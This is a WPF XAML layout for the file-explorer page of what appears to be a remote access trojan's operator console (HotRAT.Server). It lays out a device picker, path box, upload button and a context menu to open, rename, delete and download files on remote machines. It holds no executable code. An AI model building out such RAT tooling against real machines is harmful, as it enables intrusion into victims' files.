HotRAT.Server/Pages/FileExplorer.xaml

<Page x:Class="HotRAT.Server.Pages.FileExplorer"
      xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
      xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
      xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
      xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
      xmlns:local="clr-namespace:HotRAT.Server.Pages"
      xmlns:ui="http://schemas.inkore.net/lib/ui/wpf/modern"
      mc:Ignorable="d" 
      d:DesignHeight="450" d:DesignWidth="800"
      Title="FileExplorer">

    <Grid>
        <Button x:Name="BackPath" Margin="55,6,0,0" VerticalAlignment="Top" Height="32" Width="35" Padding="0,0,0,0" Click="BackPath_Click">
            <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Back}" FontSize="12"/>
        </Button>
        <TextBox x:Name="FolderPathTextBox" Grid.Row="0" Margin="195,5,5,0" Height="32" VerticalAlignment="Top" MinHeight="30" Padding="5,5,5,5" Text="C:\" FontSize="16" PreviewKeyDown="FolderPathTextBox_PreviewKeyDown" />
        <ui:ListView Name="listViewFiles" ItemsSource="{Binding Files}"  Margin="0,50,0,0" MouseDoubleClick="listViewFiles_MouseDoubleClick">
            <ui:ListView.ItemTemplate>
                <DataTemplate>
                    <WrapPanel>
                        <ui:FontIcon Icon="{Binding Icon}" FontSize="15" Margin="10,0,10,0"/>
                        <TextBlock Grid.Row="0" Text="{Binding FileName}" Margin="10,0,10,0" MaxWidth="250" Width="250" />
                        <TextBlock Grid.Row="0" Text="{Binding Type}" Margin="10,0,10,0" MaxWidth="120" Width="120" />
                        <TextBlock Grid.Row="1" Text="{Binding CreatTime}" Margin="10,0,10,0" MaxWidth="150" Width="150" />
                        <TextBlock Grid.Row="2" Text="{Binding ChangeTime}" Margin="10,0,10,0" MaxWidth="150" Width="150" />
                        <TextBlock Grid.Row="3" Text="{Binding Size}" Margin="10,0,10,0" Width="140" MaxWidth="140" />
                    </WrapPanel>
                </DataTemplate>
            </ui:ListView.ItemTemplate>
            <ui:ListView.ContextMenu>
                <ContextMenu PlacementTarget="{Binding RelativeSource={RelativeSource Self}}">
                    <MenuItem Click="OpenFile_Click">
                        <MenuItem.Header>
                            <StackPanel Orientation="Horizontal">
                                <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.OpenFile}" FontSize="16"/>
                                <TextBlock Margin="10,0,0,0" Text="Open" ></TextBlock>
                            </StackPanel>
                        </MenuItem.Header>
                    </MenuItem>
                    <MenuItem>
                        <MenuItem.Header>
                            <StackPanel Orientation="Horizontal">
                                <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.CopyTo}" FontSize="16"/>
                                <TextBlock Margin="10,0,0,0" Text="Copy to" ></TextBlock>
                            </StackPanel>
                        </MenuItem.Header>
                    </MenuItem>
                    <MenuItem>
                        <MenuItem.Header>
                            <StackPanel Orientation="Horizontal">
                                <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Cut}" FontSize="16"/>
                                <TextBlock Margin="10,0,0,0" Text="Cut to" ></TextBlock>
                            </StackPanel>
                        </MenuItem.Header>
                    </MenuItem>
                    <MenuItem>
                        <MenuItem.Header>
                            <StackPanel Orientation="Horizontal">
                                <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Rename}" FontSize="16"/>
                                <TextBlock Margin="10,0,0,0" Text="Rename" ></TextBlock>
                            </StackPanel>
                        </MenuItem.Header>
                    </MenuItem>
                    <MenuItem Click="DelFile_Click">
                        <MenuItem.Header>
                            <StackPanel Orientation="Horizontal">
                                <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Delete}" FontSize="16"/>
                                <TextBlock Margin="10,0,0,0" Text="Delect" ></TextBlock>
                            </StackPanel>
                        </MenuItem.Header>
                    </MenuItem>
                    <MenuItem Click="DownloadItem_Click">
                        <MenuItem.Header>
                            <StackPanel Orientation="Horizontal">
                                <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Download}" FontSize="16"/>
                                <TextBlock Margin="10,0,0,0" Text="Download" ></TextBlock>
                            </StackPanel>
                        </MenuItem.Header>
                    </MenuItem>
                </ContextMenu>
            </ui:ListView.ContextMenu>
        </ui:ListView>
        <ComboBox x:Name="devices_" HorizontalAlignment="Left" Margin="100,4,0,0" VerticalAlignment="Top" Width="83" Height="34" MinWidth="82" SelectionChanged="devices__SelectionChanged"/>
        <Button x:Name="Upload" Margin="10,6,0,0" VerticalAlignment="Top" Height="32" Width="35" Padding="0,0,0,0" Click="Upload_Click">
            <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Upload}" FontSize="12"/>
        </Button>
    </Grid>
</Page>
